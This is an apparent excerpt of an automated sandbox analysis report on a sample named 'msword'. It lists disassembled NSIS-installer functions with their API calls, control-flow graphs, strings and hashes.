                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                    • API String ID: 2872004960-3619442763
                                                                    • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                    • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                    Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                    APIs
                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                    • API String ID: 608394941-1650083594
                                                                    • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                    • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                    Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • lstrcatW.KERNEL32(00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401A76
                                                                    • CompareFileTime.KERNEL32(-00000014,?,WarsFeltMadridFarmsPee,WarsFeltMadridFarmsPee,00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$WarsFeltMadridFarmsPee
                                                                    • API String ID: 4286501637-4051260161
                                                                    • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                    • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                    Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 653 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 656 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 653->656 657 4035d7-4035dc 653->657 665 403615 656->665 666 4036fc-40370a call 4032d2 656->666 658 4037b6-4037ba 657->658 668 40361a-403631 665->668 672 403710-403713 666->672 673 4037c5-4037ca 666->673 670 403633 668->670 671 403635-403637 call 403336 668->671 670->671 677 40363c-40363e 671->677 675 403715-40372d call 403368 call 403336 672->675 676 40373f-403769 GlobalAlloc call 403368 call 40337f 672->676 673->658 675->673 703 403733-403739 675->703 676->673 701 40376b-40377c 676->701 679 403644-40364b 677->679 680 4037bd-4037c4 call 4032d2 677->680 685 4036c7-4036cb 679->685 686 40364d-403661 call 405e0c 679->686 680->673 689 4036d5-4036db 685->689 690 4036cd-4036d4 call 4032d2 685->690 686->689 700 403663-40366a 686->700 697 4036ea-4036f4 689->697 698 4036dd-4036e7 call 407281 689->698 690->689 697->668 702 4036fa 697->702 698->697 700->689 706 40366c-403673 700->706 707 403784-403787 701->707 708 40377e 701->708 702->666 703->673 703->676 706->689 709 403675-40367c 706->709 710 40378a-403792 707->710 708->707 709->689 711 40367e-403685 709->711 710->710 712 403794-4037af SetFilePointer call 405e0c 710->712 711->689 713 403687-4036a7 711->713 716 4037b4 712->716 713->673 715 4036ad-4036b1 713->715 717 4036b3-4036b7 715->717 718 4036b9-4036c1 715->718 716->658 717->702 717->718 718->689 719 4036c3-4036c5 718->719 719->689
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00403598
                                                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                    Strings
                                                                    • Error launching installer, xrefs: 004035D7
                                                                    • Inst, xrefs: 0040366C
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                    • soft, xrefs: 00403675
                                                                    • Null, xrefs: 0040367E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 4283519449-527102705
                                                                    • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                    • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                    • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                    • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                    Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004033E7
                                                                    • GetTickCount.KERNEL32 ref: 00403464
                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                    • wsprintfW.USER32 ref: 004034A4
                                                                    • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                    • String ID: ... %d%%$P1B$X1C$X1C
                                                                    • API String ID: 651206458-1535804072
                                                                    • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                    • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                    • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                    • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                    Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                    • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2740478559-0
                                                                    • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                    • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                    • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                    • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                    Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                    APIs
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GlobalFree.KERNELBASE(008F3A70), ref: 00402387
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FreeGloballstrcpyn
                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$WarsFeltMadridFarmsPee
                                                                    • API String ID: 1459762280-1231270740
                                                                    • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                    • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                    • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                    • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                    Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
